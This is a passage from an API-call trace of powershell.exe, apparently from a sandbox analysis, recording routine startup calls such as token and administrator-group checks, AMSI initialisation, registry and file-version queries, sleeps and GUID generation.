returned 0x0 [0137.589] GetCurrentProcess () returned 0xffffffff [0137.590] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x520f0c0 | out: TokenHandle=0x520f0c0*=0x414) returned 1 [0137.596] GetTokenInformation (in: TokenHandle=0x414, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x520f0c4 | out: TokenInformation=0x0, ReturnLength=0x520f0c4) returned 0 [0137.597] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x7620628 [0137.597] GetTokenInformation (in: TokenHandle=0x414, TokenInformationClass=0x8, TokenInformation=0x7620628, TokenInformationLength=0x4, ReturnLength=0x520f0c4 | out: TokenInformation=0x7620628, ReturnLength=0x520f0c4) returned 1 [0137.599] LocalFree (hMem=0x7620628) returned 0x0 [0137.601] DuplicateTokenEx (in: hExistingToken=0x414, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x520f0cc | out: phNewToken=0x520f0cc*=0x288) returned 1 [0137.601] CheckTokenMembership (in: TokenHandle=0x288, SidToCheck=0x5379508*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x520f0dc | out: IsMember=0x520f0dc) returned 1 [0137.601] CloseHandle (hObject=0x288) returned 1 [0137.964] CoTaskMemAlloc (cb=0x804) returned 0x76109e0 [0137.964] GetConsoleTitleW (in: lpConsoleTitle=0x76109e0, nSize=0x400 | out: lpConsoleTitle="C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x3a [0138.259] CoTaskMemFree (pv=0x76109e0) [0138.481] CoTaskMemAlloc (cb=0x804) returned 0x76109e0 [0138.481] GetConsoleTitleW (in: lpConsoleTitle=0x76109e0, nSize=0x400 | out: lpConsoleTitle="C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x3a [0139.114] CoTaskMemFree (pv=0x76109e0) [0139.230] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0139.244] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.287] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.345] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.385] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.428] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.492] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.536] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.585] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.632] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.678] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.726] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.772] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.884] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.928] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.977] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.059] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.117] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.164] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.233] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0144.416] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0144.475] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0144.551] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0144.604] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0144.650] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0144.697] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0144.791] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0144.860] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0144.901] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0144.996] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.041] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.088] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.135] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.205] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.243] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.291] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.335] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.379] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.429] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.477] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.523] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.730] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.774] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.912] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0146.006] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0146.052] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0146.076] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0146.093] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0146.111] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0146.152] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0146.153] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0166.166] CoUninitialize () Thread: id = 22 os_tid = 0x518 Thread: id = 23 os_tid = 0x11a4 [0123.044] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0123.049] CoGetContextToken (in: pToken=0x734f924 | out: pToken=0x734f924) returned 0x0 [0123.049] CObjectContext::QueryInterface () returned 0x0 [0123.049] CObjectContext::GetCurrentThreadType () returned 0x0 [0123.050] Release () returned 0x0 [0123.050] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0123.050] CoUninitialize () [0123.050] RoInitialize () returned 0x1 [0123.050] RoUninitialize () returned 0x0 [0123.434] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x105, lpBuffer=0x734ed4c, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config", lpFilePart=0x0) returned 0x40 [0123.434] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x734f208) returned 1 [0123.434] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x734f284 | out: lpFileInformation=0x734f284*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0123.434] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x734f204) returned 1 [0130.865] GetCurrentProcessId () returned 0x1064 [0130.865] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1064) returned 0x610 [0130.865] EnumProcessModules (in: hProcess=0x610, lphModule=0x5354bd8, cb=0x100, lpcbNeeded=0x734f43c | out: lphModule=0x5354bd8, lpcbNeeded=0x734f43c) returned 1 [0130.865] GetModuleInformation (in: hProcess=0x610, hModule=0x1020000, lpmodinfo=0x5354d18, cb=0xc | out: lpmodinfo=0x5354d18*(lpBaseOfDll=0x1020000, SizeOfImage=0x6c000, EntryPoint=0x10295f0)) returned 1 [0130.866] CoTaskMemAlloc (cb=0x804) returned 0x324b1e8 [0130.866] GetModuleBaseNameW (in: hProcess=0x610, hModule=0x1020000, lpBaseName=0x324b1e8, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0130.866] CoTaskMemFree (pv=0x324b1e8) [0130.866] CoTaskMemAlloc (cb=0x804) returned 0x324b1e8 [0130.866] GetModuleFileNameExW (in: hProcess=0x610, hModule=0x1020000, lpFilename=0x324b1e8, nSize=0x800 | out: lpFilename="C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0130.866] CoTaskMemFree (pv=0x324b1e8) [0130.866] CloseHandle (hObject=0x610) returned 1 [0130.867] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x104, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0130.867] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x734f3bc) returned 1 [0130.867] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x734f438 | out: lpFileInformation=0x734f438*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fdc1d0a, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x9fdc1d0a, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x9fdc1d0a, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x69000)) returned 1 [0130.867] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x734f3b8) returned 1 [0130.867] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpdwHandle=0x734f4ac | out: lpdwHandle=0x734f4ac) returned 0x72c [0130.868] GetFileVersionInfoW (in: lptstrFilename="C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", dwHandle=0x0, dwLen=0x72c, lpData=0x5356f08 | out: lpData=0x5356f08) returned 1 [0130.868] VerQueryValueW (in: pBlock=0x5356f08, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x734f480, puLen=0x734f47c | out: lplpBuffer=0x734f480*=0x5357298, puLen=0x734f47c) returned 1 [0130.868] VerQueryValueW (in: pBlock=0x5356f08, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\CompanyName", lplpBuffer=0x734f400, puLen=0x734f3fc | out: lplpBuffer=0x734f400*=0x5356fc0, puLen=0x734f3fc) returned 1 [0130.868] VerQueryValueW (in: pBlock=0x5356f08, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileDescription", lplpBuffer=0x734f400, puLen=0x734f3fc | out: lplpBuffer=0x734f400*=0x5357014, puLen=0x734f3fc) returned 1 [0130.868] VerQueryValueW (in: pBlock=0x5356f08, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileVersion", lplpBuffer=0x734f400, puLen=0x734f3fc | out: lplpBuffer=0x734f400*=0x535705c, puLen=0x734f3fc) returned 1 [0130.868] VerQueryValueW (in: pBlock=0x5356f08, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\InternalName", lplpBuffer=0x734f400, puLen=0x734f3fc | out: lplpBuffer=0x734f400*=0x53570c4, puLen=0x734f3fc) returned 1 [0130.868] VerQueryValueW (in: pBlock=0x5356f08, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalCopyright", lplpBuffer=0x734f400, puLen=0x734f3fc | out: lplpBuffer=0x734f400*=0x5357100, puLen=0x734f3fc) returned 1 [0130.868] VerQueryValueW (in: pBlock=0x5356f08, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\OriginalFilename", lplpBuffer=0x734f400, puLen=0x734f3fc | out: lplpBuffer=0x734f400*=0x5357184, puLen=0x734f3fc) returned 1 [0130.868] VerQueryValueW (in: pBlock=0x5356f08, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductName", lplpBuffer=0x734f400, puLen=0x734f3fc | out: lplpBuffer=0x734f400*=0x53571cc, puLen=0x734f3fc) returned 1 [0130.868] VerQueryValueW (in: pBlock=0x5356f08, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductVersion", lplpBuffer=0x734f400, puLen=0x734f3fc | out: lplpBuffer=0x734f400*=0x535723c, puLen=0x734f3fc) returned 1 [0130.868] VerQueryValueW (in: pBlock=0x5356f08, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\Comments", lplpBuffer=0x734f400, puLen=0x734f3fc | out: lplpBuffer=0x734f400*=0x0, puLen=0x734f3fc) returned 0 [0130.868] VerQueryValueW (in: pBlock=0x5356f08, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalTrademarks", lplpBuffer=0x734f400, puLen=0x734f3fc | out: lplpBuffer=0x734f400*=0x0, puLen=0x734f3fc) returned 0 [0130.868] VerQueryValueW (in: pBlock=0x5356f08, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\PrivateBuild", lplpBuffer=0x734f400, puLen=0x734f3fc | out: lplpBuffer=0x734f400*=0x0, puLen=0x734f3fc) returned 0 [0130.868] VerQueryValueW (in: pBlock=0x5356f08, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\SpecialBuild", lplpBuffer=0x734f400, puLen=0x734f3fc | out: lplpBuffer=0x734f400*=0x0, puLen=0x734f3fc) returned 0 [0130.868] VerQueryValueW (in: pBlock=0x5356f08, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x734f3f4, puLen=0x734f3f0 | out: lplpBuffer=0x734f3f4*=0x5357298, puLen=0x734f3f0) returned 1 [0130.869] VerLanguageNameW (in: wLang=0x409, szLang=0x734f184, cchLang=0x100 | out: szLang="English (United States)") returned 0x17 [0130.869] VerQueryValueW (in: pBlock=0x5356f08, lpSubBlock="\\", lplpBuffer=0x734f404, puLen=0x734f400 | out: lplpBuffer=0x734f404*=0x5356f30, puLen=0x734f400) returned 1 [0131.549] AmsiInitialize () returned 0x0 [0138.936] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x734eb90, nSize=0x80 | out: lpBuffer="﹔ص玡ܴܴ\x01") returned 0x0 [0144.754] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x734eb90, nSize=0x80 | out: lpBuffer="က煄˳") returned 0x0 [0168.247] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.257] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.293] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.294] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.294] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.295] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.295] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.295] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.295] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.295] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.296] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.296] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.296] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.296] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.296] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.296] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.297] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.297] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.297] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.297] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.297] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.298] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.298] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.298] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0168.298] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0180.330] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x734f2ac | out: phkResult=0x734f2ac*=0x67c) returned 0x0 [0180.333] RegQueryValueExW (in: hKey=0x67c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x734f2cc, lpData=0x0, lpcbData=0x734f2c8*=0x0 | out: lpType=0x734f2cc*=0x1, lpData=0x0, lpcbData=0x734f2c8*=0x56) returned 0x0 [0180.333] RegQueryValueExW (in: hKey=0x67c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x734f2cc, lpData=0x541c5e4, lpcbData=0x734f2c8*=0x56 | out: lpType=0x734f2cc*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x734f2c8*=0x56) returned 0x0 [0180.333] RegCloseKey (hKey=0x67c) returned 0x0 [0180.890] GetTimeZoneInformation (in: lpTimeZoneInformation=0x734f07c | out: lpTimeZoneInformation=0x734f07c) returned 0x2 [0180.894] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x734e8f0, nSize=0x80 | out: lpBuffer="က澪က澪") returned 0x0 [0180.895] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x36a12782, Data2=0xf401, Data3=0x4845, Data4=([0]=0x8f, [1]=0xb3, [2]=0x42, [3]=0x5f, [4]=0x72, [5]=0x43, [6]=0x9e, [7]=0x5e))) returned 0x0 [0181.065] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xe0ffb833, Data2=0x3ad2, Data3=0x4c2b, Data4=([0]=0xb3, [1]=0x10, [2]=0x9e, [3]=0x54, [4]=0x9d, [5]=0x4e, [6]=0x3b, [7]=0x69))) returned 0x0 [0181.072] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x8be391d5, Data2=0xed6c, Data3=0x4582, Data4=([0]=0x84, [1]=0xac, [2]=0x9b, [3]=0x37, [4]=0xec, [5]=0x1b, [6]=0x19, [7]=0xf4))) returned 0x0 [0181.074] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xea51d974, Data2=0x92fa, Data3=0x4ff7, Data4=([0]=0xb8, [1]=0x2f, [2]=0xfd, [3]=0x7b, [4]=0x3c, [5]=0x4b, [6]=0x48, [7]=0xb8))) returned 0x0 [0181.079] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x7096831b, Data2=0x3e0b, Data3=0x425b, Data4=([0]=0x87, [1]=0xe9, [2]=0x0, [3]=0x45, [4]=0x89, [5]=0x5, [6]=0xd4, [7]=0x5c))) returned 0x0 [0181.081] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x16016cc1, Data2=0xcc57, Data3=0x427d, Data4=([0]=0x9c, [1]=0xa6, [2]=0x73, [3]=0x69, [4]=0xc3, [5]=0xac, [6]=0xe1, [7]=0xe7))) returned 0x0 [0181.086] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xff72e325, Data2=0x3821, Data3=0x4532, Data4=([0]=0x9d, [1]=0xc4, [2]=0xef, [3]=0x44, [4]=0x79, [5]=0x7e, [6]=0x42, [7]=0x69))) returned 0x0 [0181.328] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xd340b3d, Data2=0xe77c, Data3=0x4d67, Data4=([0]=0xa5, [1]=0x8, [2]=0x5d, [3]=0xe8, [4]=0x6c, [5]=0xf1, [6]=0x61, [7]=0xf))) returned 0x0 [0181.346] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x2c6da424, Data2=0x22c4, Data3=0x48ef, Data4=([0]=0x9e, [1]=0xff, [2]=0x77, [3]=0x94, [4]=0x3b, [5]=0xf8, [6]=0xc2, [7]=0x88))) returned 0x0 [0181.347] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xd36c4e03, Data2=0xd39b, Data3=0x4c7b, Data4=([0]=0xb1, [1]=0xc6, [2]=0x85, [3]=0x91, [4]=0xa, [5]=0x48, [6]=0x78, [7]=0xb1))) returned 0x0 [0181.351] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x8392a8e2, Data2=0x9b21, Data3=0x4de5, Data4=([0]=0xbe, [1]=0xc, [2]=0xb1, [3]=0xee, [4]=0xc9, [5]=0x94, [6]=0x2, [7]=0xae))) returned 0x0 [0181.356] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xe3a80411, Data2=0xd45f, Data3=0x4a2d, Data4=([0]=0x95, [1]=0x9d, [2]=0xf7, [3]=0xd5, [4]=0x6a, [5]=0x9f, [6]=0x18, [7]=0x30))) returned 0x0 [0181.363] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xcd91eff6, Data2=0x688e, Data3=0x4b61, Data4=([0]=0xbe, [1]=0x98, [2]=0x47, [3]=0x3a, [4]=0xe1, [5]=0x2, [6]=0xf0, [7]=0xc1))) returned 0x0 [0181.364] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x7b9949a9, Data2=0xa27, Data3=0x4127, Data4=([0]=0xb5, [1]=0x6f, [2]=0xec, [3]=0xf3, [4]=0x6, [5]=0xbd, [6]=0xd5, [7]=0xa0))) returned 0x0 [0181.368] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x15a48dcf, Data2=0x5bdb, Data3=0x43e0, Data4=([0]=0xbf, [1]=0xf4, [2]=0x7c, [3]=0x3c, [4]=0xf3, [5]=0x29, [6]=0x5e, [7]=0x4d))) returned 0x0 [0181.369] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x222bd064, Data2=0x1a1b, Data3=0x4ccf, Data4=([0]=0x86, [1]=0xfa, [2]=0xa0, [3]=0x8c, [4]=0x9, [5]=0xe6, [6]=0x6c, [7]=0xc4))) returned 0x0 [0181.373] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x8f371eea, Data2=0x3fef, Data3=0x42fc, Data4=([0]=0x8b, [1]=0x56, [2]=0x8a, [3]=0xa2, [4]=0x58, [5]=0xdd, [6]=0xd7, [7]=0xc1))) returned 0x0 [0181.374] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xe3815ad6, Data2=0xfd3f, Data3=0x4cbd, Data4=([0]=0x83, [1]=0x6b, [2]=0x4b, [3]=0x6a, [4]=0xba, [5]=0x6, [6]=0xea, [7]=0x37))) returned 0x0 [0181.375] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xb99bf78d, Data2=0xcb7b, Data3=0x41cc, Data4=([0]=0x9e, [1]=0x12, [2]=0x8, [3]=0xd, [4]=0xce, [5]=0xd9, [6]=0xfa, [7]=0xeb))) returned 0x0 [0181.377] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x2e889c25, Data2=0xb7ec, Data3=0x4ec2, Data4=([0]=0x8b, [1]=0x60, [2]=0x88, [3]=0xcd, [4]=0x40, [5]=0x48, [6]=0xed, [7]=0x7a))) returned 0x0 [0181.534] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x66d0c06e, Data2=0x696a, Data3=0x447c, Data4=([0]=0x89, [1]=0xca, [2]=0x12, [3]=0x2, [4]=0xc4, [5]=0x78, [6]=0x36, [7]=0xbb))) returned 0x0 [0181.534] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x106dcadc, Data2=0xd9f5, Data3=0x4e3c, Data4=([0]=0xac, [1]=0xd, [2]=0x85, [3]=0x2f, [4]=0x36, [5]=0xdf, [6]=0x62, [7]=0x67))) returned 0x0 [0181.536] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x4d695b93, Data2=0x1acf, Data3=0x4af6, Data4=([0]=0xa6, [1]=0xee, [2]=0xde, [3]=0x7, [4]=0xf6, [5]=0xa5, [6]=0xee, [7]=0x17))) returned 0x0 [0181.537] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xb78ec3dc, Data2=0x399f, Data3=0x4cb1, Data4=([0]=0xb6, [1]=0xb8, [2]=0xa5, [3]=0x92, [4]=0x12, [5]=0xc7, [6]=0xee, [7]=0x72))) returned 0x0 [0181.538] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x52ea4200, Data2=0xf6ea, Data3=0x4481, Data4=([0]=0xb9, [1]=0x1e, [2]=0x2b, [3]=0xbe, [4]=0x8e, [5]=0xc, [6]=0x23, [7]=0xa4))) returned 0x0 [0181.538] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xfa622e7f, Data2=0x2607, Data3=0x402e, Data4=([0]=0xba, [1]=0x1d, [2]=0x3e, [3]=0x70, [4]=0xe3, [5]=0x33, [6]=0x11, [7]=0xc4))) returned 0x0 [0181.538] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x9148c70d, Data2=0x9d81, Data3=0x467b, Data4=([0]=0xa0, [1]=0xb2, [2]=0xb0, [3]=0xfa, [4]=0x47, [5]=0x15, [6]=0x3, [7]=0xea))) returned 0x0 [0181.540] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x799d0180, Data2=0xd142, Data3=0x4d55, Data4=([0]=0x83, [1]=0x75, [2]=0x6f, [3]=0x60, [4]=0x17, [5]=0xbb, [6]=0x6c, [7]=0x17))) returned 0x0 [0181.541] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xb3c89a2d, Data2=0xf2b2, Data3=0x4314, Data4=([0]=0x82, [1]=0xd2, [2]=0x4c, [3]=0xc0, [4]=0x9c, [5]=0x5a, [6]=0x20, [7]=0x4))) returned 0x0 [0181.542] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xefa4ea87, Data2=0x4e63, Data3=0x4d4f, Data4=([0]=0x8c, [1]=0xde, [2]=0x3, [3]=0xe3, [4]=0xbd, [5]=0xd4, [6]=0xd7, [7]=0x9))) returned 0x0 [0181.542] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x59cf9fd6, Data2=0xf80d, Data3=0x456c, Data4=([0]=0xa2, [1]=0x6e, [2]=0x1d, [3]=0xbc, [4]=0x85, [5]=0x76, [6]=0x37, [7]=0x7c))) returned 0x0 [0181.543] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x7419a637, Data2=0x6359, Data3=0x45f2, Data4=([0]=0x8e, [1]=0x9, [2]=0x9b, [3]=0xe0, [4]=0x31, [5]=0xd0, [6]=0xa6, [7]=0x25))) returned 0x0 [0181.543] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xb6a399da, Data2=0x7f83, Data3=0x4df6, Data4=([0]=0x93, [1]=0x82, [2]=0xc0, [3]=0xc3, [4]=0x3a, [5]=0x2b, [6]=0xe5, [7]=0x82))) returned 0x0 [0181.545] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x83ef50d9, Data2=0xe3a3, Data3=0x40ee, Data4=([0]=0x93, [1]=0x65, [2]=0x53, [3]=0xf3, [4]=0xf2, [5]=0x5e, [6]=0x5e, [7]=0x94))) returned 0x0 [0181.545] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0xfeaeec98, Data2=0x1d1c, Data3=0x4bc9, Data4=([0]=0x87, [1]=0x3a, [2]=0xf6, [3]=0xd, [4]=0xd7, [5]=0x7f, [6]=0xa6, [7]=0x9))) returned 0x0 [0181.545] CoCreateGuid (in: pguid=0x734f144 | out: pguid=0x734f144*(Data1=0x8d162312, Data2=0xe1d7, Data3=0x42d0, Data4=([0]=0x84, [1]=0xc0, [2]=0x8f, [3]=0xb2, [4]=0x50, [5]=0x92, 